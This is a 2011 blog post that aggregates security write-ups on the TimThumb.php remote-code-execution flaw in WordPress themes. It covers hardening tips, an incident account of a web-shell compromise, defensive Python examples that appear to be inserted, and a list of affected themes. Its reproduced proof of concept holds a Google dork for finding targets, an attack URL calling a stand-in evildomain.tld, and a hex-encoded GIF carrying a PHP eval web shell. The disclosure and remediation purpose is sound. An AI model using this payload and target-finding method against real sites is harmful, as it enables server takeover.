Monday, August 15, 2011

Timthumb.php Security Vulnerability [Wordpress Theme]


This news has been widely discussed this week, and I have collected a few of the pages I read into this post. If you want to see the full article or the details of the news, please go to the source.

The News 

There has been some buzz about a zero day vulnerability found in Timthumb.php that can allow for arbitrary file uploads. Although this is a platform independent issue, it is especially an issue on WordPress where a lot of theme authors choose to include scripts in themes without any extra security measures.
You can read more details about the TimThumb issue here: markmaunder.com
This is definitely an issue, but it’s just the tip of the iceberg. TimThumb is just one of various scripts that are being added to themes/plugins without further vetting, or even incorrectly. Take Uploadify for example, which we’ve recently seen being exploited in very old versions of a popular WordPress theme.

Another issue is inexperience, well, along with laziness in some cases. WordPress has built in a lot of great capabilities that aren’t being properly leveraged. For example, if theme/plugin authors were properly leveraging add_image_size vs. adding TimThumb they would be in a safer position today.
Unfortunately this is not an easy problem to tackle. WordPress core has a great review and vetting process; it is very controlled for good reason. The problem here is really around plugins and themes; it’s not as simple as you may think to check every release, given that there are thousands of free and premium options on the market today.

Minimize Your Risk

Here are a few things that if put into practice, will help you minimize the risk of getting exploited:
  1. Keep your themes and plugins updated – #1 cause of malware infections and hacks independent of any platform!
  2. Only download from reputable sources (WordPress.org).
  3. Only use plugins and themes that are being actively developed and have good, trusted reviews. Do your homework.
  4. Keep an eye on WordPress security news to see if there are any issues with the plugins or themes you are using.
  5. Don’t just disable, remove any software that you’re not actively using. Just because it’s not active doesn’t mean it’s not vulnerable.

Sucuri WordPress Check

Here is a script we created to enable you to check for some of the issues we’ve outlined above – Sucuri WP Check

How to Use

  1. Save script to your local machine by right clicking the link above and save link as
  2. Login to your site via sFTP or FTP (We recommend sFTP/SSH)
  3. Upload the script to your root WordPress directory
  4. Rename sucuri_wp_check.txt to sucuri_wp_check.php
  5. Run the script via browser of choice – yourdomain.com/sucuri_wp_check.php – Make sure you change the URL path to your domain and wherever you uploaded the file
  6. Check the results
Source: http://blog.sucuri.net/2011/08/timthumb-php-security-vulnerability-just-the-tip-of-the-iceberg.html

Details and scripts of the WordPress Timthumb.php hack

also run the latest version of WordPress.org.
My WordPress root directory was writable, but making it read only would not have prevented the hack.
Timthumb.php in its default configuration allows site visitors to load images from a predefined set of remote websites for resizing and serving. Timthumb offers a caching mechanism so that it doesn’t have to continually re-process images. The cache directory lives under the wordpress root and is accessible by visitors to the website.
The ability for a site visitor to load content from a remote website and to make the web server write that remote content to a web accessible directory is the cause of the vulnerability in timthumb.php.
To be clear, timthumb.php does not actually execute any remote malicious code that causes this vulnerability. This was a point of confusion among some commenters in my blog post yesterday. It simply gets a remote file and places it in a web accessible directory.
Timthumb only allows remote content from a small range of websites to be loaded remotely. In its default configuration these included Blogger, WordPress.com and other sites that are writeable by the general public.
Timthumb’s verification that remote content was only being loaded by these domains was also broken. You could for example load content from hackersiteblogspot.com or from blogspot.com.hackersite.com.
I’ve submitted a patch that fixes the pattern matching and removed all default public hosting sites from the allowed sites list. The developer has opted to keep a small list, which I’m not in favor of.
In my case the hacker uploaded a script to my cache directory which timthumb.php stores as “external_.php”. He/she then accessed this script directly in my timthumb cache directory as something like http://markmaunder.com/wp-content/themes/Memoir/scripts/cache/external_md5hash.php
The script uploaded was Alucar shell which is base64 encoded and decodes when it executes. That makes it a little harder to find it using grep or a similar tool. You can see the encoded version of Alucar here and the decoded version of Alucar here (without the username and password preamble at the top).
Here’s a screenshot of the UI:
This script which gives a web based shell access was then used to inject base64 code to one of my core wordpress files wp-blog-header.php which lives in the wordpress root directory. The file with injected code looked like this.
The decoded version of this base64 code is this. The code executes whenever a blog page is visited. It fetches a file from a URL and writes it to /tmp. Then it executes the php code that is contained in this file. In my case it simply echo’d some javascript code that would show ads. Here is the code contained in the file in /tmp.
Again, this file is periodically updated with new PHP code, so the attacker could have his way with my server until I found out about it. The code could be altered to instead become a spam system and work its way through a long list of spam emails.
The way I tracked this to conclusion was:
  • Heard audio on my blog telling me I’d won something.
  • Checked Chrome network tools and saw ad content loading and I don’t serve ads.
  • Grepped wordpress source and themes for hostname I saw in ad. Nothing.
  • Dumped mysql databases on server (all of them) and grepped for hostname. Nothing.
  • Confusion reigns.
  • Started working my way through nginx (which is my front end proxy to apache) and apache access and error logs.
  • Spotted lines in apache error log like this: “[Mon Aug 01 11:09:12 2011] [error] [client 127.0.0.1] PHP Warning: file_get_contents(http://blogger.com.zoha.vn/db/load.php): failed to open stream: HTTP request failed! in /usr/local/markmaunder/wp-content/themes/Memoir/timthumb.php on line 675”
  • Checked timthumb’s cache directory and found Alucar.
  • Realized base64 encoding is why I didn’t find anything with grep.
  • Regrepped wordpress source and database and found injection in wp-blog-header.php.
  • Decoded base64 stuff and played with Alucar.
  • Found tmp file in /tmp.
  • Cleaned everything and fixed permissions. Ran chkrootkit and other utils on machine to see if anything else was compromised. Changed passwords, etc.
Source: http://markmaunder.com/2011/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/
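The allowlist bypass Maunder describes (blogspot.com.hackersite.com, hackersiteblogspot.com) comes down to testing whether an allowed name appears anywhere in the URL instead of comparing the parsed host. The following added example is not Maunder's patch or TimThumb's code: it contrasts a hypothetical substring check with a strict host comparison, using the default sites named in the post purely to reproduce the bug.

```python
from urllib.parse import urlparse

# Sites TimThumb may fetch from. The defaults the post names (Blogger,
# WordPress.com) are kept here only to reproduce the matching flaw; the
# post's author recommends dropping public hosting sites from the list.
ALLOWED_SITES = ("blogger.com", "blogspot.com", "wordpress.com")

def host_allowed_broken(src):
    """Substring match modelled on the flaw described above (hypothetical,
    not TimThumb's real code): any URL *containing* an allowed name passes."""
    return any(site in src.lower() for site in ALLOWED_SITES)

def host_allowed_strict(src):
    """Parse the URL and require the host to BE an allowed site or one of
    its subdomains; allowed names elsewhere in the URL no longer count."""
    parts = urlparse(src)
    if parts.scheme not in ("http", "https"):
        return False
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False
    return any(host == site or host.endswith("." + site)
               for site in ALLOWED_SITES)

def compare(src):
    """Return (broken_verdict, strict_verdict) for one src value."""
    return host_allowed_broken(src), host_allowed_strict(src)
```

A legitimate subdomain such as example.blogspot.com still passes the strict check, which is exactly the residual risk behind the recommendation to remove public hosting sites from the list.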
Proof-Of-Concept. [PoC]
# Exploit Title: WordPress TimThumb Plugin - Remote Code Execution
# Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com
# Date: 3rd August 2011
# Author: MaXe
# Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php
# Version: 1.32
# Screenshot: See attachment
# Tested on: Windows XP + Apache + PHP (XAMPP)
  
  
WordPress TimThumb (Theme) Plugin - Remote Code Execution
  
  
Versions Affected:
1.* - 1.32 (Only version 1.19 and 1.32 were tested.)
(Version 1.33 did not save the cache file as .php)
 
  
Info: (See references for original advisory)
TimThumb is an image resizing utility, widely used in many WordPress themes.
 
  
External Links:
http://www.binarymoon.co.uk/projects/timthumb/
http://code.google.com/p/timthumb/
  
Credits:
- Mark Maunder (Original Researcher)
- MaXe (Independent Proof of Concept Writer)
  
  
-:: The Advisory ::-
TimThumb is prone to a Remote Code Execution vulnerability, because the
script does not check remotely cached files properly. By crafting a
special image file with a valid MIME-type, and appending a PHP file at
the end of this, it is possible to fool TimThumb into believing that it
is a legitimate image, thus caching it locally in the cache directory.
 
 
Attack URL: (Note! Some websites use Base64 Encoding of the src GET-request.)
http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php
 
Stored file on the Target: (This can change from host to host.)
1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src);
1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src);
md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format.
 
 
Proof of Concept File:
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65
\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00
 
(Transparent GIF + 
 
  
  
-:: Solution ::-
Update to the latest version 1.34 or delete the timthumb file.
 
NOTE: This file is often renamed and you should therefore issue
a command like this in a terminal: (Thanks to rAWjAW for this info.)
find . | grep php | xargs grep -s timthumb
  
  
Disclosure Information:
- Vulnerability Disclosed (Mark Maunder): 1st August 2011
- Vulnerability Researched (MaXe): 2nd August 2011
- Disclosed at The Exploit Database: 3rd August 2011

Source: http://www.1337day.com/exploits/16592
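The advisory's find/grep note, the cache/external_md5($src).php artifact, and the eval(base64_decode(...)) injection in wp-blog-header.php that Maunder only found after realising grep was blind to base64 are three checks a defender wants in one pass. The following added Python example is neither the advisory's nor Sucuri's code: it builds a constructed sample site and scans it, flagging PHP files that mention timthumb regardless of filename, PHP files inside any cache directory, and obfuscated eval calls.

```python
import os
import re
import tempfile

# Indicators taken from the write-ups above: a renamed TimThumb copy, PHP
# written into a cache directory, and an eval(base64_decode()) injection.
TIMTHUMB_RE = re.compile(rb"timthumb", re.I)
OBFUSCATED_EVAL_RE = re.compile(
    rb"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I)

def scan_wordpress(root):
    """Walk a WordPress tree; return sorted (kind, path) findings with
    forward-slash paths relative to root."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                data = fh.read()
            if TIMTHUMB_RE.search(data):            # catches renamed thumb.php
                findings.append(("timthumb-copy", rel))
            if os.path.basename(dirpath).lower() == "cache":
                findings.append(("php-in-cache", rel))  # external_<md5>.php
            if OBFUSCATED_EVAL_RE.search(data):    # plain grep misses the base64
                findings.append(("obfuscated-eval", rel))
    return sorted(findings)

def build_sample_tree():
    """Constructed sample site (not real data): a renamed TimThumb, a PHP
    file dropped in its cache dir, an injected core file and a clean file."""
    root = tempfile.mkdtemp()
    scripts = os.path.join(root, "wp-content", "themes", "sample", "scripts")
    os.makedirs(os.path.join(scripts, "cache"))
    files = {
        os.path.join(scripts, "thumb.php"): b"<?php // timthumb resizer (constructed)\n",
        os.path.join(scripts, "cache", "external_0123abcd.php"):
            b"GIF89a<?php /* constructed cache artifact */ ?>",
        os.path.join(root, "wp-blog-header.php"):
            b"<?php eval(base64_decode('Y29uc3RydWN0ZWQ=')); require('wp-load.php');\n",
        os.path.join(root, "wp-load.php"): b"<?php // clean file (constructed)\n",
    }
    for path, body in files.items():
        with open(path, "wb") as fh:
            fh.write(body)
    return root

def scan_sample():
    """Build the constructed tree and scan it; returns the findings list."""
    return scan_wordpress(build_sample_tree())
```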

List of Themes

The Timthumb 0-day security vulnerability is generating a lot of noise and for good reason. If you have a theme that includes TimThumb, your site can be easily hacked.
Because of this, we checked the WordPress Free Themes Directory and aggregated a list of themes that include TimThumb. 

If you use any of the following themes please check to see if the script is present, and make sure it is updated: 

8q/scripts/timthumb.php
aerial/lib/timthumb.php
aesthete/timthumb.php
albizia/includes/timthumb.php
amphion-lite/script/timthumb.php
aqua-blue/includes/timthumb.php
aranovo/scripts/timthumb.php
arras/library/timthumb.php
arras-theme/library/timthumb.php
arthemix-bronze/scripts/timthumb.php
arthemix-green/scripts/timthumb.php
artisan/includes/timthumb.php
a-simple-business-theme/scripts/timthumb.php
a-supercms/timthumb.php
aureola/scripts/timthumb.php
aurorae/timthumb.php
autofashion/thumb.php
automotive-blog-theme/Quick Cash Auto/timthumb.php
automotive-blog-theme/timthumb.php
bikes/thumb.php
black_eve/timthumb.php
blex/scripts/timthumb.php
bloggnorge-a1/scripts/timthumb.php
blogified/timthumb.php
blue-corporate-hyve-theme/timthumb.php
bluemag/library/timthumb.php
blue-news/scripts/timthumb.php
bombax/includes/timthumb.php
breakingnewz/timthumb.php
brightsky/scripts/timthumb.php
brochure-melbourne/includes/timthumb.php
business-turnkey/assets/js/timthumb.php
calotropis/includes/timthumb.php
coffee-lite/thumb.php
comet/scripts/timthumb.php
conceditor-wp-strict/scripts/timthumb.php
constructor/layouts/thumb.php
constructor/libs/timthumb.php
constructor/timthumb.php
coverht-wp/scripts/timthumb.php
cover-wp/scripts/timthumb.php
dark-dream-media/timthumb.php
deep-blue/timthumb.php
delicate/thumb.php
diamond-ray/thumb.php
dieselclothings/thumb.php
digitalblue/thumb.php
dimenzion/timthumb.php
epione/script/timthumb.php
evr-green/scripts/timthumb.php
famous/megaframe/megapanel/inc/upload.php
famous/timthumb.php
fashion-style/thumb.php
featuring/timthumb.php
fliphoto/timthumb.php
flix/timthumb.php
fordreporter/scripts/thumb.php
freeside/thumb.php
fresh-blu/scripts/timthumb.php
go-green/modules/timthumb.php
granite-lite/scripts/timthumb.php
greydove/timthumb.php
greyzed/functions/efrog/lib/timthumb.php
gunungkidul/thumb.php
heartspotting-beta/thumb.php
heli-1-wordpress-theme/images/timthumb.php
ideatheme/timthumb.php
impressio/timthumb/timthumb.php
introvert/thumb.php
inuit-types/thumb.php
isotherm-news/thumb.php
iwana-v10/timthumb.php
jambo/thumb.php
jcblackone/thumb.php
kratalistic/thumb.php
life-style-free/thumb.php
likehacker/timthumb.php
litepress/scripts/timthumb.php
loganpress-premium-theme-1/thumb.php
magazine-basic/thumb.php
magup/timthumb.php
make-money-online-theme-1/scripts/timthumb.php
make-money-online-theme-2/scripts/timthumb.php
make-money-online-theme-3/scripts/timthumb.php
make-money-online-theme-4/scripts/timthumb.php
make-money-online-theme/scripts/timthumb.php
meintest/layouts/thumb.php
mobilephonecomparision/thumb.php
moi-magazine/timthumb.php
my-heli/images/timthumb.php
mymag/timthumb.php
mystique/extensions/auto-thumb/timthumb.php
nash/theme-assets/php/timthumb.php
neofresh/timthumb.php
neo_wdl/includes/extensions/thumb.php
new-green-natural-living-ngnl/scripts/timthumb.php
newspress/thumb.php
pearlie/scripts/timthumb.php
pico/scripts/timthumb.php
postage-sydney/includes/timthumb.php
premium-violet/thumb.php
probluezine/timthumb.php
pronto/cjl/pronto/uploadify/check.php
pronto/cjl/pronto/uploadify/uploadify.php
r755/thumb.php
regal/timthumb.php
shaan/timthumb.php
shadow-block/thumb.php
shadow/timthumb.php
simple-but-great/timthumb.php
simplenews_premium/scripts/timthumb.php
simple-red-theme/timthumb.php
simple-tabloid/thumb.php
simplewhite/timthumb.php
slidette/timThumb/timthumb.php
snowblind_colbert/thumb.php
snowblind/thumb.php
spotlight/timthumb.php
squeezepage/timthumb.php
standout/thumb.php
suffusion/timthumb.php
swift/includes/thumb.php
swift/includes/timthumb.php
swift/timthumb.php
techozoic-fluid/options/thumb.php
the_dark_os/tools/timthumb.php
themetiger-fashion/thumb.php
theory/thumb.php
the-theme/core/libs/thumbnails/thumb.php
thrillingtheme/thumb.php
tm-theme/js/timthumb.php
totallyred/scripts/timthumb.php
travelogue-theme/scripts/timthumb.php
true-blue-theme/timthumb.php
ttnews-theme/timthumb.php
twittplus/scripts/timthumb.php
typographywp/timthumb.php
ugly/timthumb.php
unity/timthumb.php
versitility/timthumb.php
vibefolio-teaser-10/scripts/timthumb.php
vina/thumb.php
whitemag/script/thumb.php
wpapi/thumb.php
wpbus-d4/includes/timthumb.php
wp-creativix/scripts/timthumb.php
wp-newsmagazine/scripts/timthumb.php
wp-perfect/js/timthumb.php
wp-premium-orange/timthumb.php
xiando-one/thumb.php
zcool-like/timthumb.php
zcool-like/uploadify.php
Caution: This is not a full list of every theme in the directory that may include TimThumb, just a good start. Even if your theme is not found on this list it is a good idea to do a thorough review for the script, and not a bad thought to contact the theme author.
Note: We only listed the free themes found in the WordPress Free Themes Directory SVN, there are probably many more themes that include TimThumb in the premium theme market. Make sure to check with your vendor to ensure the vulnerability has been fixed if they include the script. 

Edit: Thanks to @ottodestruct for clarifying that not all of these themes are approved and/or available to the public via the WordPress Free Themes Directory. Although they are currently found in the theme repository, they are not all publicly available for download.



By Kaila Piyush HackingArticles4all.blogspot.com
